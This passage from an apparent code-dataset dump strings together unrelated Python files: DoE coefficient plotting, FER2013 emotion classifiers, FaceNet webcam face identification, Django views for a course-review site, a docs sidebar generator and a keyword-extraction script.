Plot the Henry's chart of the coefficients a_i.
coefficents:
A list or an array with the coefficients.
coefficents_labels:
A list or an array with the labels of the coefficient.
empirical_cumulative_distribution:
classical - f(i) = i/N
modified - f(i) = (i + a)/(N + 1 + 2a)
title:
The title of the chart.
legend:
Legend to display on the chart.
block:
Defines if the plot should block or no the execution of the code.
show:
Defines if the figure has to be displayed or no.
**kwargs:
Others optional arguments for the plot function (like the color, etc).
"""
l = len(coefficents)
n = int(np.log2(l))
if coefficents_labels:
labels = np.array(coefficents_labels, dtype=str)
else:
labels = np.array(gen_a_labels(n), dtype=str)
if remove_a0:
coefficents = coefficents[1:]
labels = labels[1:]
l = len(coefficents)
# https://stackoverflow.com/a/7851166
index = sorted(range(len(coefficents)),
key=coefficents.__getitem__, reverse=False)
coefficents = coefficents[index]
labels = labels[index]
# Empirical cumulative distribution f(i)
dist = coefficents
if empirical_cumulative_distribution == "classical":
for i in range(l):
dist[i] = (i+1)/l
elif empirical_cumulative_distribution == "modified":
for i in range(l):
dist[i] = (i+1+a)/(l+1+2*a)
else:
print("Error: unknown empirical mode.")
# Corresponding quantile (normit) z(i)
normits = erfinv(2*dist - 1) * np.sqrt(2)
fig, ax = plt.subplots()
ax.plot(coefficents, normits, marker='1',
linestyle='--', linewidth=0.5, **kwargs)
ax.set_title(title)
ax.set_yticks(normits)
ax.set_yticklabels(labels)
ax.grid(which='major')
ax.legend([legend])
fig.tight_layout()
if show:
plt.show(block=block)
return fig, ax
def clear_draw(mpl):
mpl.ax.clear()
mpl.draw()
def main():
# Test 1
y = np.array([77, 28.5, 141, 110, 161, 113, 220, 190])
print("y:", y)
a_hat = np.dot(gen_X_hat(int(np.log2(len(y)))), y)
print("a_hat:", a_hat)
y_hat = np.dot(gen_X(n=3), a_hat)
print("y_hat:", y_hat)
plot_coefficents(a_hat, block=False, color="orange")
plot_pareto(a_hat, block=True, color="orange")
plot_henry(a_hat, empirical_cumulative_distribution="modified",
block=True, color="blue")
print('Test 1:', y_hat == y, end="\n\n")
# Test 2
a_hat = np.array([10.25, 1.25, 0.75, 0.05])
print("a_hat:", a_hat)
y = np.array([8.3, 10.7, 9.7, 12.3])
print("y:", y)
a_hat_check = np.dot(gen_X_hat(n=2), y)
print("a_hat_check", a_hat_check)
plot_coefficents(a_hat, block=True, color="orange")
plot_henry(a_hat, empirical_cumulative_distribution="modified",
block=True, color="blue")
print('Test 2:', a_hat_check == a_hat, end="\n\n")
# Gen label
print(gen_a_labels(2)[3])
"""
n = 3
DoE = gen_design(n)
print(DoE)
DoE = gen_design(n, perm=None) # [0, 2, 1, 4, 3, 5, 6, 7])
print(DoE)
X = gen_X(n, show=False)
X_hat = gen_X_hat(n, show=True)
"""
if __name__ == "__main__":
main()
``` |
{
"source": "2010019970909/fer2013_using_Neural_Network",
"score": 4
} |
#### File: 2010019970909/fer2013_using_Neural_Network/load_and_process.py
```python
import pandas as pd
import numpy as np
import warnings
warnings.filterwarnings("ignore")
from sklearn import preprocessing
from sklearn.decomposition import PCA
from sklearn.utils import shuffle
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import Perceptron
from sklearn.metrics import confusion_matrix
from sklearn.neural_network import MLPClassifier
# Load the data and convert them to numpy files fdataX.npy and flabels.npy
def load_and_process(datafile='./fer2013.csv', images_key='pixels', labels_key='emotion', width=48, height=48):
print('Open the file')
data = pd.read_csv(datafile)
print('File opened, procced to the data extraction')
# getting the images from the dataset
datapoints = data[images_key].tolist()
usage = np.array(data['Usage'].tolist())
y = np.array(data['emotion'].tolist()) # Extract the target
# getting features for training
X = []
for xseq in datapoints:
X.append([int(pixel) for pixel in xseq.split(' ')])# [int(xp) for xp in xseq.split(' ')]).reshape(width, height).astype('float32'))
X = np.asarray(X)
# adapt the dimension of the data for the CNN
# X = np.expand_dims(np.asarray(X), -1)
# getting labels for training
# y = pd.get_dummies(data[labels_key]).as_matrix()
print("Extract the training, validation and testing set from the data")
# Extract the training, validation and testing set from the data
train_in = X[usage == 'Training']
train_out = y[usage == 'Training']
# print(len(train_in), len(train_out))
valid_in = X[usage == 'PrivateTest']
print(valid_in.shape)
valid_out = y[usage == 'PrivateTest']
print(valid_out.shape)
# print(len(valid_in), len(valid_out))
test_in = X[usage == 'PublicTest']
test_out = y[usage == 'PublicTest']
# print(len(test_in), len(test_out))
print('Shuffle the sets')
# Shuffling the training database in order to improve the efficiency
train_in, train_out = shuffle(train_in, train_out)
valid_in, valid_out = shuffle(valid_in, valid_out)
test_in, test_out = shuffle(test_in, test_out)
# m_classes = len(np.unique(train_out))
# print(m_classes)
print('Normalise the sets')
# Normalise the input variables
scaler_train = preprocessing.MinMaxScaler(feature_range=(-128,127)).fit(train_in)
scaled_train_in = scaler_train.transform(train_in)
scaler_valid = preprocessing.MinMaxScaler(feature_range=(-128,127)).fit(train_in)
scaled_valid_in = scaler_valid.transform(valid_in)
# print(scaled_valid_in.shape)
scaler_test = preprocessing.MinMaxScaler(feature_range=(-128,127)).fit(train_in)
scaled_test_in = scaler_test.transform(test_in)
# print(len(scaled_train_in), len(scaled_valid_in))
print('PCA analysis')
# PCA analysis
pca = PCA(n_components = 103)
model_pca = pca.fit(scaled_train_in) # Fit the PCA to the data
pca_train = model_pca.transform(scaled_train_in)
pca_valid = model_pca.transform(scaled_valid_in)
print('PCA VALID SHAPE' , pca_valid.shape)
pca_test = model_pca.transform(scaled_test_in)
# Scale the data
scaler = StandardScaler() # doctest: +SKIP
# Don't cheat - fit only on training data
scaler.fit(pca_train) # doctest: +SKIP
scaled_pca_train = scaler.transform(pca_train) # doctest: +SKIP
# apply same transformation to test data
scaled_pca_valid = scaler.transform(pca_valid) # doctest: +SKIP
scaled_pca_test = scaler.transform(pca_test) # doctest: +SKIP
# CLASSES_NAME = ['Angry', 'Disgust', 'Fear', 'Happy', 'Sad', 'Surprise', 'Neutral']
# Single Perceptron
print('Train perceptron from PCA')
clf = Perceptron(fit_intercept=False,
max_iter=1000,
tol=1e-3,
shuffle=False).fit(scaled_pca_train, train_out)
print('End training')
# print(clf.predict(scaled_pca_train))
print(clf.score(scaled_pca_train, train_out))
train_pred = clf.predict(scaled_pca_train)
conf_matrix_train = confusion_matrix(train_out, train_pred)
print(conf_matrix_train)
# print(clf.predict(scaled_pca_valid))
# print(scaled_pca_valid.shape, valid_out.shape)
print(clf.score(scaled_pca_valid, valid_out))
valid_pred = clf.predict(scaled_pca_valid)
conf_matrix_valid = confusion_matrix(valid_out, valid_pred)
print(conf_matrix_valid)
# print(clf.predict(scaled_pca_test))
print(clf.score(scaled_pca_test, test_out))
test_pred = clf.predict(scaled_pca_test)
conf_matrix_test = confusion_matrix(test_out, test_pred)
print(conf_matrix_test)
# MLP
print('Train MLP from PCA')
clf = MLPClassifier(solver='adam', alpha=1e-5, hidden_layer_sizes=(100,), random_state=1).fit(scaled_pca_train, train_out)
print('End training')
# print(clf.predict(scaled_pca_train))
print(clf.score(scaled_pca_train, train_out))
train_pred = clf.predict(scaled_pca_train)
conf_matrix_train = confusion_matrix(train_out, train_pred)
print(conf_matrix_train)
# print(clf.predict(scaled_pca_valid))
# print(scaled_pca_valid.shape, valid_out.shape)
print(clf.score(scaled_pca_valid, valid_out))
valid_pred = clf.predict(scaled_pca_valid)
conf_matrix_valid = confusion_matrix(valid_out, valid_pred)
print(conf_matrix_valid)
# print(clf.predict(scaled_pca_test))
print(clf.score(scaled_pca_test, test_out))
test_pred = clf.predict(scaled_pca_test)
conf_matrix_test = confusion_matrix(test_out, test_pred)
print(conf_matrix_test)
print('Train perceptron from normalised pixels')
clf = Perceptron(fit_intercept=False,
max_iter=1000,
tol=1e-3,
shuffle=False).fit(scaled_train_in, train_out)
print('End training')
# print(clf.predict(scaled_pca_train))
print(clf.score(scaled_train_in, train_out))
train_pred = clf.predict(scaled_train_in)
conf_matrix_train = confusion_matrix(train_out, train_pred)
print(conf_matrix_train)
# print(clf.predict(scaled_pca_valid))
# print(scaled_pca_valid.shape, valid_out.shape)
print(clf.score(scaled_valid_in, valid_out))
valid_pred = clf.predict(scaled_valid_in)
conf_matrix_valid = confusion_matrix(valid_out, valid_pred)
print(conf_matrix_valid)
# print(clf.predict(scaled_pca_test))
print(clf.score(scaled_test_in, test_out))
test_pred = clf.predict(scaled_test_in)
conf_matrix_test = confusion_matrix(test_out, test_pred)
print(conf_matrix_test)
# MLP
print('Train MLP from normalised pixels')
clf = MLPClassifier(solver='adam', alpha=1e-5, hidden_layer_sizes=(100,), random_state=1).fit(scaled_train_in, train_out)
print('End training')
# print(clf.predict(scaled_pca_train))
print(clf.score(scaled_train_in, train_out))
train_pred = clf.predict(scaled_train_in)
conf_matrix_train = confusion_matrix(train_out, train_pred)
print(conf_matrix_train)
# print(clf.predict(scaled_pca_valid))
# print(scaled_pca_valid.shape, valid_out.shape)
print(clf.score(scaled_valid_in, valid_out))
valid_pred = clf.predict(scaled_valid_in)
conf_matrix_valid = confusion_matrix(valid_out, valid_pred)
print(conf_matrix_valid)
# print(clf.predict(scaled_pca_test))
print(clf.score(scaled_test_in, test_out))
test_pred = clf.predict(scaled_test_in)
conf_matrix_test = confusion_matrix(test_out, test_pred)
print(conf_matrix_test)
"""
Conclusion:
Perceptron, PCA (accuracy of around 20%) was less efficient than MLP, PCA
(accuracy of around 40%) but they both worked better than Perceptron, pixels
(accuracy of around 20%) and MLP, pixels (accuracy of around 10%).
Also, in the confusion matrix we can see that the emotion 1 (disgust)
is the most difficult to classify (in any case).
With 1000 hidden layers (against the 15 of before) and the adam solver
(against the 'lbfgs') the NNet gets overfitted but we slightly improve
the performances with the normalised pixels.
The perceptron works better with the pixels with an accuracy of around 30%
against 20% with the PCA. For the 1000 hidden layers MLP, PCA the accuracy is
around 63% for the training and around 40% for the test (validation and test set).
For the 1000 hidden layers MLP, pixels the accuracy is
around 61% for the training and around 35% for the test (validation and test set).
The state-of-the-art for the image classifier is an ImageNet network
(https://paperswithcode.com/sota/image-classification-on-imagenet) which can reach
above 70% accuracy values. Also the usage of CNN should improve the accuracy of
the neural network, as implemented in the following article:
https://medium.com/themlblog/how-to-do-facial-emotion-recognition-using-a-cnn-b7bbae79cd8f
"""
if __name__ == "__main__":
load_and_process()
print("Preprocessing Done")
``` |
{
"source": "201019-UiPath/Jewlz-TheBoyz-PlaylistAutomation-P2",
"score": 3
} |
#### File: Project2Final/FaceRecognition/data_preprocess.py
```python
import os
import shutil
import sys
import time
def startPreprocessing(cwd, relative_path):
input_datadir = relative_path + '/pre_img'
output_datadir = relative_path + '/train_img'
os.chdir(cwd + '/FaceRecognition/')
if not hasattr(sys, 'argv'):
sys.argv = ['']
sys.path.append('.')
fullpath = os.path.expanduser(relative_path + '/pre_img/')
if os.path.isdir(fullpath):
shutil.rmtree(fullpath)
time.sleep(.3) # making sure the folder is completely deleted before trying to create it again
os.mkdir(fullpath)
from preprocess import preprocesses
obj = preprocesses(input_datadir,output_datadir)
nrof_images_total, nrof_successfully_aligned = obj.collect_data()
return 'Total number of images: {}. Number of successfully aligned images: {}'.format(nrof_images_total, nrof_successfully_aligned)
```
#### File: Project2Final/FaceRecognition/identify_face_image.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from scipy import misc
import cv2
import numpy as np
import os
import time
import pickle
import sys
def captureAndIdentify(cwd, relative_path):
modeldir = relative_path + '/model/20170511-185253.pb'
classifier_filename = relative_path + '/class/classifier.pkl'
npy= relative_path + '/npy'
train_img= relative_path + '/train_img'
WINDOW_TITLE = "Take photo using SPACE to continue with the process."
os.chdir(cwd + '/FaceRecognition/')
if not hasattr(sys, 'argv'):
sys.argv = ['']
sys.path.append('.')
import facenet
import detect_face
import tensorflow as tf
cam = cv2.VideoCapture(0)
cv2.namedWindow(WINDOW_TITLE)
img_name = ''
result_names = ''
while cv2.getWindowProperty(WINDOW_TITLE, 0) >= 0:
ret, frame = cam.read()
cv2.imshow(WINDOW_TITLE, frame)
if not ret:
break
k = cv2.waitKey(1)
if k%256 == 32:
# SPACE pressed
img_name = "capture.png"
cv2.imwrite(os.getcwd() + "/" + img_name, frame)
print("{} written!".format(img_name))
break
if k%256 == 27:
# ESC pressed
print("Escape hit, closing...")
break
cam.release()
cv2.destroyAllWindows()
if img_name == '':
return 'Error: Did not capture anything. Press SPACE to capture a photo.'
with tf.Graph().as_default():
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.6)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=False))
with sess.as_default():
pnet, rnet, onet = detect_face.create_mtcnn(sess, os.path.expanduser(npy))
minsize = 20 # minimum size of face
threshold = [0.6, 0.7, 0.7] # three steps's threshold
factor = 0.709 # scale factor
margin = 44
frame_interval = 3
batch_size = 1000
image_size = 182
input_image_size = 160
HumanNames = os.listdir(os.path.expanduser(train_img))
HumanNames.sort()
print('Loading feature extraction model')
facenet.load_model(modeldir)
images_placeholder = tf.get_default_graph().get_tensor_by_name("input:0")
embeddings = tf.get_default_graph().get_tensor_by_name("embeddings:0")
phase_train_placeholder = tf.get_default_graph().get_tensor_by_name("phase_train:0")
embedding_size = embeddings.get_shape()[1]
classifier_filename_exp = os.path.expanduser(classifier_filename)
with open(classifier_filename_exp, 'rb') as infile:
(model, class_names) = pickle.load(infile, encoding='latin1')
# video_capture = cv2.VideoCapture("akshay_mov.mp4")
c = 0
print('Start Recognition!')
prevTime = 0
# ret, frame = video_capture.read()
frame = cv2.imread(img_name,0)
os.remove('capture.png') # clean up
# frame = cv2.resize(frame, (0,0), fx=0.5, fy=0.5) #resize frame (optional)
curTime = time.time()+1 # calc fps
timeF = frame_interval
if (c % timeF == 0):
find_results = []
if frame.ndim == 2:
frame = facenet.to_rgb(frame)
frame = frame[:, :, 0:3]
bounding_boxes, _ = detect_face.detect_face(frame, minsize, pnet, rnet, onet, threshold, factor)
nrof_faces = bounding_boxes.shape[0]
print('Faces Detected: %d' % nrof_faces)
if nrof_faces > 0:
det = bounding_boxes[:, 0:4]
img_size = np.asarray(frame.shape)[0:2]
cropped = []
scaled = []
scaled_reshape = []
bb = np.zeros((nrof_faces,4), dtype=np.int32)
for i in range(nrof_faces):
emb_array = np.zeros((1, embedding_size))
bb[i][0] = det[i][0]
bb[i][1] = det[i][1]
bb[i][2] = det[i][2]
bb[i][3] = det[i][3]
# inner exception
if bb[i][0] <= 0 or bb[i][1] <= 0 or bb[i][2] >= len(frame[0]) or bb[i][3] >= len(frame):
print('face is too close')
continue
cropped.append(frame[bb[i][1]:bb[i][3], bb[i][0]:bb[i][2], :])
cropped[i] = facenet.flip(cropped[i], False)
scaled.append(misc.imresize(cropped[i], (image_size, image_size), interp='bilinear'))
scaled[i] = cv2.resize(scaled[i], (input_image_size,input_image_size),
interpolation=cv2.INTER_CUBIC)
scaled[i] = facenet.prewhiten(scaled[i])
scaled_reshape.append(scaled[i].reshape(-1,input_image_size,input_image_size,3))
feed_dict = {images_placeholder: scaled_reshape[i], phase_train_placeholder: False}
emb_array[0, :] = sess.run(embeddings, feed_dict=feed_dict)
predictions = model.predict_proba(emb_array)
print(predictions)
best_class_indices = np.argmax(predictions, axis=1)
# print(best_class_indices)
best_class_probabilities = predictions[np.arange(len(best_class_indices)), best_class_indices]
print('Best class indicies: ', best_class_indices)
print('Best class probabilites: ' ,best_class_probabilities)
if len([x for x in predictions[0].tolist() if x >= 0.8]) == 0:
print('No Valid Faces')
return 'Error: No valid faces detected. Will not continue with the process.'
else:
print('Here')
cv2.rectangle(frame, (bb[i][0], bb[i][1]), (bb[i][2], bb[i][3]), (0, 255, 0), 2) #boxing face
#plot result idx under box
text_x = bb[i][0]
text_y = bb[i][3] + 20
print('Result Indices: ', best_class_indices[0])
print('Human Names: ', HumanNames)
for H_i in HumanNames:
print('Human at index: ',H_i)
if HumanNames[best_class_indices[0]] == H_i:
result_names = HumanNames[best_class_indices[0]]
cv2.putText(frame, result_names, (text_x, text_y), cv2.FONT_HERSHEY_COMPLEX_SMALL,
1, (0, 0, 255), thickness=1, lineType=2)
else:
return 'Error: No faces detected. Will not continue with the process.'
cv2.imshow('Valid faces detected. Close window to proceeed.', frame)
while cv2.getWindowProperty('Valid faces detected. Close window to proceeed.', 0) >= 0:
k = cv2.waitKey(1)
if k%256 == 27:
# ESC pressed
print("Escape hit, closing...")
break
cv2.destroyAllWindows()
return result_names
``` |
{
"source": "2010jing/uicCourse",
"score": 2
} |
#### File: course/templatetags/url_replace.py
```python
from urllib.parse import urlencode
from django import template
register = template.Library()
@register.simple_tag(takes_context=True)
def url_replace(context, **kwargs):
query = context['request'].GET.dict()
query.update(kwargs)
return urlencode(query)
```
#### File: uicCourse/dashboard/views.py
```python
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login, logout
from django.contrib import messages
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from .forms import SignUpForm, CreateTagForm, ProfileModifyForm, CreateNoticeForm
from course.models import ValidDivisionMajorPair, CourseType
from voting.models import Tags, QuickVotes, UserTaggingCourse
from .models import Notice
def welcome_page(request):
latest_notice = Notice.objects.filter(is_visible=True)[:3] # only take latest notice
return render(request, 'index/index.html', {'latest_notice': latest_notice})
def login_page(request):
if request.method == 'POST':
username = request.POST.get('username', '')
password = request.POST.get('password', '')
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
messages.add_message(request, messages.SUCCESS, 'Login successfully.')
return redirect('/course/')
else:
messages.add_message(request, messages.ERROR, 'Wrong username or password.')
return redirect('/login/')
else:
if not request.user.is_authenticated:
messages.add_message(request, messages.INFO, 'Login is require to continue.')
return render(request, 'auth/login.html')
else:
messages.add_message(request, messages.ERROR, 'No Double Login Is Allowed.')
return redirect('/')
def logout_receiver(request):
logout(request)
messages.add_message(request, messages.SUCCESS, 'Logout successfully.')
return redirect('/')
def signup_page(request):
if not request.user.is_authenticated:
if request.method == 'POST':
form = SignUpForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
raw_password = form.cleaned_data.get('<PASSWORD>')
user = authenticate(username=username, password=<PASSWORD>)
login(request, user)
messages.add_message(request, messages.SUCCESS, 'Sign up successfully.')
return redirect('/course/')
else:
form = SignUpForm()
return render(request, 'auth/signup.html', {'form': form})
else:
messages.add_message(request, messages.ERROR, 'Not Allow.')
return redirect('/')
@login_required
def profile_page(request):
return render(request, 'auth/profile.html')
@login_required
def profile_change(request):
if request.method == 'POST':
form = ProfileModifyForm(data=request.POST, instance=request.user)
if form.is_valid():
form.save()
messages.success(request, 'Your profile successfully updated!')
return redirect('/dashboard/profile/')
else:
messages.error(request, 'Please correct the error below.')
else:
form = ProfileModifyForm(instance=request.user)
return render(request, 'auth/change_profile.html', {'form': form})
@login_required
def change_password_page(request):
if request.method == 'POST':
form = PasswordChangeForm(request.user, request.POST)
if form.is_valid():
user = form.save()
update_session_auth_hash(request, user) # Important!
messages.success(request, 'Your password was successfully updated!')
return redirect('/course/')
else:
messages.error(request, 'Please correct the error below.')
else:
form = PasswordChangeForm(request.user)
return render(request, 'auth/change_password.html', {'form': form})
def terms_page(request):
return render(request, 'index/terms.html')
def privacy_page(request):
return render(request, 'index/privacy.html')
@login_required
def dashboard(request):
return render(request, 'dashboard/index.html')
@staff_member_required
def major_division(request):
pairs = ValidDivisionMajorPair.objects.all()
return render(request, 'dashboard/major_division.html', {'pairs': pairs})
@staff_member_required
def course_type(request):
pairs = CourseType.objects.all()
return render(request, 'dashboard/course_type.html', {'pairs': pairs})
@staff_member_required
def tags_page(request):
tags = Tags.objects.all()
return render(request, 'dashboard/tags.html', {'tags': tags})
@staff_member_required
def tags_create(request):
if request.method == 'POST':
form = CreateTagForm(request.POST)
if form.is_valid():
tag = form.save()
messages.success(request, 'The Tag: ' + tag.tag_title + ' was successfully created!')
return redirect('/dashboard/tags/')
else:
messages.error(request, 'Please correct the error below.')
else:
form = CreateTagForm()
return render(request, 'dashboard/tag_create.html', {'form': form})
@staff_member_required
def tags_modify(request, tag_id):
if request.method == 'POST':
changing_tag = Tags.objects.get(pk=tag_id)
form = CreateTagForm(data=request.POST, instance=changing_tag)
if form.is_valid():
form.save()
messages.success(request, 'The tag has been successfully modified!')
return redirect('/dashboard/tags/')
else:
messages.error(request, 'Please correct the error below.')
else:
tag = Tags.objects.get(pk=tag_id)
form = CreateTagForm(instance=tag)
return render(request, 'dashboard/tag_create.html', {'form': form, 'is_modify': True, 'tag_id': tag.id})
@staff_member_required
def tags_delete(request, tag_id):
delete_tag = Tags.objects.get(pk=tag_id)
delete_tag.delete()
messages.success(request, 'The tag has been successfully deleted!')
return redirect('/dashboard/tags/')
@staff_member_required
def notice_page(request):
notices = Notice.objects.all()
return render(request, 'dashboard/notice.html', {'notices': notices})
@staff_member_required
def notice_create(request):
if request.method == 'POST':
form = CreateNoticeForm(request.POST)
if form.is_valid():
notice = form.save()
messages.success(request, 'The Notice: ' + notice.title + ' was successfully created!')
return redirect('/dashboard/notices/')
else:
messages.error(request, 'Please correct the error below.')
else:
form = CreateNoticeForm()
return render(request, 'dashboard/notice_create.html', {'form': form})
@staff_member_required
def notice_modify(request, notice_id):
if request.method == 'POST':
changing_notice = Notice.objects.get(pk=notice_id)
form = CreateNoticeForm(data=request.POST, instance=changing_notice)
if form.is_valid():
form.save()
messages.success(request, 'The notice has been successfully modified!')
return redirect('/dashboard/notices/')
else:
messages.error(request, 'Please correct the error below.')
else:
notice = Notice.objects.get(pk=notice_id)
form = CreateNoticeForm(instance=notice)
return render(request, 'dashboard/notice_create.html', {'form': form, 'is_modify': True, 'notice_id': notice.id})
@staff_member_required
def notice_delete(request, notice_id):
delete_notice = Notice.objects.get(pk=notice_id)
delete_notice.delete()
messages.success(request, 'The notice has been successfully deleted!')
return redirect('/dashboard/notices/')
@login_required
def quick_vote_record(request):
votes = QuickVotes.objects.filter(voter=request.user)
return render(request, 'dashboard/quickvote.html', {'votes': votes})
@login_required
def review_record(request):
reviews = UserTaggingCourse.objects.filter(tagger=request.user)
return render(request, 'dashboard/review.html', {'reviews': reviews})
``` |
{
"source": "2011301000133/2011301000133.github.io",
"score": 3
} |
#### File: 2011301000133.github.io/reading/auto_generat_sidebar.py
```python
import os
import re
import string
# 字数统计
regex_chinese = re.compile('[\u4e00-\u9fa5]') # 汉字
regex_English = re.compile('[0-9a-zA_Z]+') # 数字和英语单词
# 中文标点和英文标点
regex_punctuation = re.compile('[!"()*+,./:;<=>?{|}~。;,:“”()、?《》]')
def word_count(file_name_md):
f = open(file_name_md, 'r', encoding='utf-8')
passages = f.readlines()
# word_num = sum([len(passage.replace('\n', '').replace(' ', '')) for passage in passages])
word_num = sum([len(regex_chinese.findall(passage))
+ len(regex_English.findall(passage))
+ len(regex_punctuation.findall(passage))
for passage in passages])
f.close()
return word_num
class TreeNode:
def __init__(self, name, type, layer, word_num=0):
self.name = name
self.type = type # 'file' or 'path'
self.layer = layer
self.word_num = word_num
self.children = dict()
def __repr__(self):
# return self.name+self.type+str(self.layer)+str([i for i in self.children])
return 'name={name},type={type},layer={layer},word_num={word_num},children={children}'. \
format(name=self.name, type=self.type, layer=self.layer, word_num=self.word_num,
children=[i for i in self.children])
class Tree:
def __init__(self, path):
path_walker = os.walk(path, topdown=True)
self.path1, self.path2 = '\\'.join(path.split('\\')[:-1]), path.split('\\')[-1]
# 'C:\\Users\\guofei8\\Desktop\\git\\GitHub\\reading', 'docs' 这种
self.root = TreeNode(self.path2, 'path', 0)
self.add_all_tree_node(path_walker)
def addTreeNode(self, path, dirs, nondirs):
pointer = self.root
for i in path:
if i not in pointer.children:
pointer.children[i] = TreeNode(i, 'path', pointer.layer + 1)
pointer = pointer.children[i]
for i in dirs:
pointer.children[i] = TreeNode(name='* ' + i, type='path', layer=pointer.layer + 1)
for i in nondirs:
# 每个节点的 name 是规整后的 markdown语句,这样前序遍历不需要太多处理就可以满足需求
word_num = word_count('\\'.join([self.path1] + path + [i]))
file_name_md = '* [' + i.replace('.md', '') + \
('<sup style = "color:red">' + str(word_num) + '字<sup>' if word_num else '') \
+ ']' \
+ '(' + '/'.join(path) + '/' + i + ')'
pointer.children[i] = TreeNode(name=file_name_md,
type='file',
layer=pointer.layer + 1,
word_num=word_num)
def add_all_tree_node(self, path_walker):
for top, dirs, nondirs in path_walker:
path = top.replace(self.path1, '').split('\\')[1:] # 0号位是一个空字符串
self.addTreeNode(path, dirs, nondirs)
def pre_order(self, root):
return '' if (root is None) \
else ((root.layer - 2) * ' ' if root.layer > 1 else '# ') + root.name + '\n' + \
''.join([self.pre_order(i) for i in root.children.values()])
def pre_order2(self, root):
'''
总字数
'''
return 0 if (root is None) else root.word_num + sum([self.pre_order2(i) for i in root.children.values()])
path = os.getcwd() + r'\docs'
tree = Tree(path)
sidebar = tree.pre_order(tree.root.children[tree.path2])
print(sidebar)
# 总字数
c = tree.pre_order2(tree.root.children[tree.path2])
print('总字数:',c)
# %%
head = '''
<a href="http://www.guofei.site" target='blog'>
<img src="http://www.guofei.site/public/img/me.png" alt="回到blog" height="64" width="64">
</a>
'''
tail = '''
* 书单
* [书单](书单/书单.md)
* [读完的书单](书单/读完的书单.md)
* 建站日志
* [快速开始](建站日志/quickstart.md)
* [配置项](建站日志/configuration.md)
* [主题](建站日志/themes.md)
* [扩展Markdown语法<sup style="color:red">(new)<sup>](建站日志/markdown.md)
* [mermaid语法](建站日志/mermaid.md)
'''
content = '\n'.join(sidebar.split('\n')[1:])
f = open('sidebar.md', 'w', encoding='utf-8')
# print(head+content)
# f.write(head+content.encode('utf-8').decode('utf-8'))
f.write(head + content + tail)
f.close()
f = open('homepage.md', 'w', encoding='utf-8')
# print(head+content)
# f.write(head+content.encode('utf-8').decode('utf-8'))
f.write(content)
f.close()
# %%
# 统计每个板块的字数
def word_ana():
import re
regex = re.compile("[0-9]+['字']")
total_analys = []
for i in sidebar.split('\n')[1:]:
if len(i) > 0:
if i[0] == '*':
chapter = i[2:]
else:
k = regex.findall(i)
word_num = int(k[0].replace('字', '')) if len(k) > 0 else 0
total_analys.append([chapter, word_num])
import pandas as pd
total_analys_pd = pd.DataFrame(total_analys, columns=['chapter', 'word_num'])
a = total_analys_pd.groupby('chapter').sum()
import plotly.graph_objs as go
import plotly
# 拆成画图所需数据格式
data1 = go.Bar(
x=a.index,
y=a.word_num,
name='v1'
)
layout = go.Layout(title="bar charts", xaxis={'title': 'x'}, yaxis={'title': 'value'})
fig = go.Figure(data=[data1], layout=layout)
plotly.offline.plot(fig, filename='c:\\abc\\example.html')
# word_ana()
``` |
{
"source": "2011-sagittarius/FakeNews",
"score": 3
} |
#### File: FakeNews/python/KeywordExtraction.py
```python
import sys
dataset = sys.argv[1]
# dataset = "https://apnews.com/article/pandemics-dallas-storms-coronavirus-pandemic-texas-7a04c04d40943e53ee17f7f946d3a7fa"
############################
###### OLD PROCESSING ######
############################
import pandas
import re
import nltk
from nltk.corpus import stopwords
from nltk.stem.wordnet import WordNetLemmatizer
##Creating a list of stop words and adding custom stopwords
stop_words = set(stopwords.words("english"))
##Creating a list of custom stopwords
new_words = ["using", "show", "result", "large", "also", "iv", "one", "two", "new", "previously", "shown", "one", "two", "three", "four", "five", "six", "seven", "eight", "nine", "ten" "us", "u.s."]
stop_words = stop_words.union(new_words)
corpus = []
## PREPROCESS DATA
text = re.sub(r'http\S+', '', dataset) #Remove URLs
text = re.sub('[^a-zA-Z]', ' ', text) #Remove punctuations
text = text.lower() #Convert to lowercase
text=re.sub("</?.*?>"," <> ",text) #remove tags
text=re.sub("(\\d|\\W)+"," ",text) # remove special characters and digits
text = text.split() #Convert to list from string
lem = WordNetLemmatizer() #Lemmatisation
text = [lem.lemmatize(word) for word in text if not word in stop_words]
text = " ".join(text)
corpus.append(text)
corpus.append('the') #countVectorizer needed an array so I append a dummy word
############################
###### NEW PROCESSING ######
############################
# import pandas as pd
# import nltk
# import re
# import contractions
# from nltk.corpus import stopwords
# from nltk.tokenize import RegexpTokenizer
# from nltk.stem import WordNetLemmatizer
# from nltk.stem.porter import PorterStemmer
# lemmatizer = WordNetLemmatizer()
# cachedStopWords = stopwords.words('english')
# cachedStopWords = set(stopwords.words("english"))
# new_words = ["using", "show", "result", "large", "also", "iv", "one", "two", "new", "previously", "shown", "one", "two", "three", "four", "five", "six", "seven", "eight", "nine", "ten", "us", "u.s."]
# cachedStopWords = cachedStopWords.union(new_words)
# tokenizer = RegexpTokenizer(r'\w+')
# def remove_html(text):
# return re.sub(r'http\S+', '', text)
# def filter_word(word):
# word = re.sub(r'[-–—]', " ", word)
# return re.sub(r'[^a-zA-Z\s]+', "", word)
# def filter_words(text):
# return ' '.join([filter_word(w) for w in text.split()])
# def remove_contractions(text): # contractions has trouble with large data sets
# return ' '.join([contractions.fix(word) for word in text.split()])
# # improved parsing time!! went from 13s per 100rows to <1s
# def rmStopAndLemmatize(arr):
# return ' '.join([lemmatizer.lemmatize(w) for w in arr if (w not in cachedStopWords and w in words)])
# text = remove_html(dataset.lower())
# text = remove_contractions(text)
# text = filter_words(text)
# text = tokenizer.tokenize(text)
# text = rmStopAndLemmatize(text)
# corpus = []
# corpus.append(text)
# corpus.append('the') #countVectorizer needed an array so I append a dummy word
## TEXT VECTORIZER
from sklearn.feature_extraction.text import CountVectorizer
import re
cv=CountVectorizer(max_df=0.8,stop_words=stop_words, max_features=10000, ngram_range=(1,3))
X=cv.fit_transform(corpus)
## CONVERT TEXT TO INT MATRIX
from sklearn.feature_extraction.text import TfidfTransformer
tfidf_transformer=TfidfTransformer(smooth_idf=True,use_idf=True)
tfidf_transformer.fit(X)
# get feature names
feature_names=cv.get_feature_names()
# fetch document for which keywords needs to be extracted
doc=corpus[0]
